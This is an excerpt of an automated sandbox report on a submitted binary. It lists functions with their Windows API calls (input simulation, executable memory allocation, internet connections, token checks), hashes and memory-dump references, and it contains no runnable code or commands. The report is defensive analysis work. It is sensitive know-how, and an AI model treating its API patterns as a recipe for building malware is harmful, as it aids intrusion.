Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 6f2bb326cb0da8f0eb7a6dfd4f706ae1b41a7b24ef585a38067d60cd6ea203c4
Instruction ID: f7e83f8025e31670399d924d97cc8e5c36002a5940d03aeb07ce906b2c52dc3d
Opcode Fuzzy Hash: 6f2bb326cb0da8f0eb7a6dfd4f706ae1b41a7b24ef585a38067d60cd6ea203c4
Instruction Fuzzy Hash: AFD0127188510DEAC740A7909888CB9737CA708301F900466F50692050E22D8B55D725

Function 0079717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ac7fbf7540da9cc0a1bf6879caa3b04102716983e7f6bbe551019a9f88f573f
Instruction ID: 6416269e16d78505b4f69fb6e74dac7596ec86fb04fb63f9b2b7fe9550c1f89b
Opcode Fuzzy Hash: 3ac7fbf7540da9cc0a1bf6879caa3b04102716983e7f6bbe551019a9f88f573f
Instruction Fuzzy Hash: BAC18E74A14216EFCF18CFA4D884EAEBBB5FF48714B148598E805EB261D734ED81DB90

Function 007BE02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 007BE0BE
CharLowerBuffW.USER32(?,?), ref: 007BE101

Part of subcall function 007BD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 007BD7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 007BE301
_memmove.LIBCMT ref: 007BE314

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 7ddd767a6190eea3f1e5e6678bdc3bcbaa3b44e441b398fc259db2fea2fc59df
Instruction ID: 6c0635f49abfd99e6bec818cbc0190c4a70430fe2c844545fb630305274c517b
Opcode Fuzzy Hash: 7ddd767a6190eea3f1e5e6678bdc3bcbaa3b44e441b398fc259db2fea2fc59df
Instruction Fuzzy Hash: 57C13971608301DFC714DF28C484AAABBE4FF89714F14896EF89A9B351D735E946CB82

Function 007B8093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 007B80C3
CoUninitialize.COMBASE ref: 007B80CE

Part of subcall function 0079D56C: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 0079D5D4

VariantInit.OLEAUT32(?), ref: 007B80D9
VariantClear.OLEAUT32(?), ref: 007B83AA

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 6b43e0f8196d8a6b6fa009c335d02fa1d099abc99c6d2bdaa838acb4070c7011
Instruction ID: 563a210dcc3a05aa4eb98ac40a4ab838d088cd3a385d5752ec86ac3d4ef3c007
Opcode Fuzzy Hash: 6b43e0f8196d8a6b6fa009c335d02fa1d099abc99c6d2bdaa838acb4070c7011
Instruction Fuzzy Hash: FCA13775604701DFCB50DF68C489B6AB7E8BF89754F048458FA969B3A1CB38ED05CB82

Function 00797530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.COMBASE(?,00000000), ref: 007976EA
CoTaskMemFree.COMBASE(00000000), ref: 00797702
CLSIDFromProgID.COMBASE(?,?), ref: 00797727
_memcmp.LIBCMT ref: 00797748

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 509cca925d35d968a4f77bd204144211a0930d8b02991167b24a408cf6933186
Instruction ID: 61057f4953cd8a0e0b645180935c1c6aa02bf43f55dd1c9334e0354eb169b555
Opcode Fuzzy Hash: 509cca925d35d968a4f77bd204144211a0930d8b02991167b24a408cf6933186
Instruction Fuzzy Hash: 19811A75A10109EFCF04DFA4D988EEEB7B9FF89315F204158E506AB250DB75AE06CB60

Function 0079687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0079688E
SysAllocString.OLEAUT32(00000000), ref: 00796937
VariantCopy.OLEAUT32 ref: 00796966
VariantClear.OLEAUT32(?), ref: 0079698D

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: a2aaf3f898575e7774591a6f2c4f4c91da6a45dcb88f66e95b1838df33beb3b1
Instruction ID: e2c95f65103374d72f250209fa23ed0841ddcf5ba5c0b39cb95a533e435f4bb3
Opcode Fuzzy Hash: a2aaf3f898575e7774591a6f2c4f4c91da6a45dcb88f66e95b1838df33beb3b1
Instruction Fuzzy Hash: 5D51A074704301DADF24AF65E895A2EB3A6EF45310F20CA1FE596DB291DB3CD8408745

Function 007AB7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 007AB89E
GetLastError.KERNEL32(?,00000000), ref: 007AB8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007AB8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007AB915

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 9a46737c3fdf07434b2499d23250432aa7e91ca74207c264a871493ee29e6c16
Instruction ID: 42aebbf67ceebdc4eb9935375eae05f0a348dcbba080afa794f3c2e9760d76c0
Opcode Fuzzy Hash: 9a46737c3fdf07434b2499d23250432aa7e91ca74207c264a871493ee29e6c16
Instruction Fuzzy Hash: E6410C35600610DFCB21EF19C449A5EBBE5EF8A310F158098ED4A9B762CB39FD45CB91

Function 007CAB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 007CAB60
GetWindowRect.USER32(?,?), ref: 007CABD6
PtInRect.USER32(?,?,007CC014), ref: 007CABE6
MessageBeep.USER32(00000000), ref: 007CAC57

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 02f5d7c6d2a5905e99fdab42adc96333842cbf78b340f9cfdacf75b762414db1
Instruction ID: 387a21efee401418eb62e7b29b29059cf47cd75437c1e8eeb5fc314227a6a8b8
Opcode Fuzzy Hash: 02f5d7c6d2a5905e99fdab42adc96333842cbf78b340f9cfdacf75b762414db1
Instruction Fuzzy Hash: 5D418B7060010DEFCB21DF58C884F6A7BF6FB48316F1881ADE8149B260C734A841CFA2

Function 007A0AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 007A0B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 007A0B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 007A0BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 007A0BFB

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 5aebcbe4e71039e710d8fdbc94152c4d2b7df0b222423188a534415f60ecbbb2
Instruction ID: 8b73025e7e9d1676ebf179dca3bb826474a1205714fe4ac30f066fdccb09d08d
Opcode Fuzzy Hash: 5aebcbe4e71039e710d8fdbc94152c4d2b7df0b222423188a534415f60ecbbb2
Instruction Fuzzy Hash: A8315CB0E40208AEFF308B259D09BF9BBA6ABC7314F048B5AF580521D1C37D895097F5

Function 007A0C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,753DC0D0,?,00008000), ref: 007A0C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 007A0C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 007A0CE1
SendInput.USER32(00000001,?,0000001C,753DC0D0,?,00008000), ref: 007A0D33

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: f287b15f14dcff7cae0b19c79d652a5545a6325f374fcc173a4f3d0005e3348f
Instruction ID: be9ee5966e2e843e9c3ac063f11fd12ea9d0e3cf73987baf9d34084695188f54
Opcode Fuzzy Hash: f287b15f14dcff7cae0b19c79d652a5545a6325f374fcc173a4f3d0005e3348f
Instruction Fuzzy Hash: C1313A30A40618AFFF348B659C08BFEBB66ABC7320F048B1EE485521D1C33D995597E5

Function 007761C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007761FB
__isleadbyte_l.LIBCMT ref: 00776229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00776257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0077628D

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 287ecd842242008b45229dae870bac4d588c68e19510573cd990f5caa3a7c3f4
Instruction ID: 9eb207729b972b2fb6129f78f463426fb1c4f6bc1e5007c22bed3dbfa287ea72
Opcode Fuzzy Hash: 287ecd842242008b45229dae870bac4d588c68e19510573cd990f5caa3a7c3f4
Instruction Fuzzy Hash: 5C31F530600A4AEFDF219F75CC48BBA7BB9FF41390F158028E82997196E739D950DB50

Function 007C4EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 007C4F02

Part of subcall function 007A3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007A365B
Part of subcall function 007A3641: GetCurrentThreadId.KERNEL32 ref: 007A3662
Part of subcall function 007A3641: AttachThreadInput.USER32(00000000,?,007A5005), ref: 007A3669

GetCaretPos.USER32(?), ref: 007C4F13
ClientToScreen.USER32(00000000,?), ref: 007C4F4E
GetForegroundWindow.USER32 ref: 007C4F54

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: cbb6df0806bcef368ca17a857f4f1e3a8a2dcebe5519de1818553f411efbeb6a
Instruction ID: 48cc46d6fb55e76fb40592c65343774fbb26951cf30df5a1128d09043de5e6b5
Opcode Fuzzy Hash: cbb6df0806bcef368ca17a857f4f1e3a8a2dcebe5519de1818553f411efbeb6a
Instruction Fuzzy Hash: D531FA71D00208AFDB00EFA9C985EEFB7F9EF99300B10406AE555E7241DB799E458BA1

Function 00798656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0079810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00798121
Part of subcall function 0079810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0079812B
Part of subcall function 0079810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0079813A
Part of subcall function 0079810A: RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00798141
Part of subcall function 0079810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00798157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007986A3
_memcmp.LIBCMT ref: 007986C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 007986FC
HeapFree.KERNEL32(00000000), ref: 00798703

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 2182266621-0
Opcode ID: d250dbd391d9af06b4644a4cb904fe1d97a3ba0d8df6bc9f8b8ddc05337d0cbe
Instruction ID: b09e36905e8021adc9104c040c77d09c874a8dcf6dda45771257f1dbfc45b8a2
Opcode Fuzzy Hash: d250dbd391d9af06b4644a4cb904fe1d97a3ba0d8df6bc9f8b8ddc05337d0cbe
Instruction Fuzzy Hash: CD21C131E40108EFDF00DFA4D949BEEB7B8EF41304F148059E404AB242EB38AE05CB51

Function 0076098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 007609AE

Part of subcall function 00745A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007A7896,?,?,00000000), ref: 00745A2C
Part of subcall function 00745A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007A7896,?,?,00000000,?,?), ref: 00745A50

_fprintf.LIBCMT ref: 007609E5
OutputDebugStringW.KERNEL32(?), ref: 00795DBB

Part of subcall function 00764AAA: _flsall.LIBCMT ref: 00764AC3

__setmode.LIBCMT ref: 00760A1A

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 5e1231cfdc79abfe6ec91516482d1176a39f4f783952d85e0262331769bc8c92
Instruction ID: db2c635ccbb831bdb3030e2e9bf52166890d5a003859f079f760cbdcc591e3d4
Opcode Fuzzy Hash: 5e1231cfdc79abfe6ec91516482d1176a39f4f783952d85e0262331769bc8c92
Instruction Fuzzy Hash: 87112731604204FFDB05B6F49C4E9BE7B699F82320F244155F60667183EF2D585247E5

Function 007B1767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007B17A3

Part of subcall function 007B182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007B184C
Part of subcall function 007B182D: InternetCloseHandle.WININET(00000000), ref: 007B18E9

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 136814334b6ba9d54334adfb2a0cb4f7e314647f3d7e7c3b7be0677be75c664d
Instruction ID: 00d03d52da838b51acdc40247cc412dd54d15f0170ef43fa1c84151aa269cb31
Opcode Fuzzy Hash: 136814334b6ba9d54334adfb2a0cb4f7e314647f3d7e7c3b7be0677be75c664d
Instruction Fuzzy Hash: 0021A431200605BFEB129F60DC15FFABBAAFF48720F90402EFA1596551DB79D82197A4

Function 007A3A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,007CFAC0), ref: 007A3A64
GetLastError.KERNEL32 ref: 007A3A73
CreateDirectoryW.KERNEL32(?,00000000), ref: 007A3A82
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,007CFAC0), ref: 007A3ADF

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: e44af569fb6e585444d28d4d2f885d249b63776cd42033c81614363fa63adf57
Instruction ID: f200149d749fa7010908cb0d0aa1adeb8a59599d8b78e55336dbb6fde64a8ed7
Opcode Fuzzy Hash: e44af569fb6e585444d28d4d2f885d249b63776cd42033c81614363fa63adf57
Instruction Fuzzy Hash: 17218675508211DF8310DF24C88586EB7E4FE96364F108B1EF499C72A2D739DE45CB52

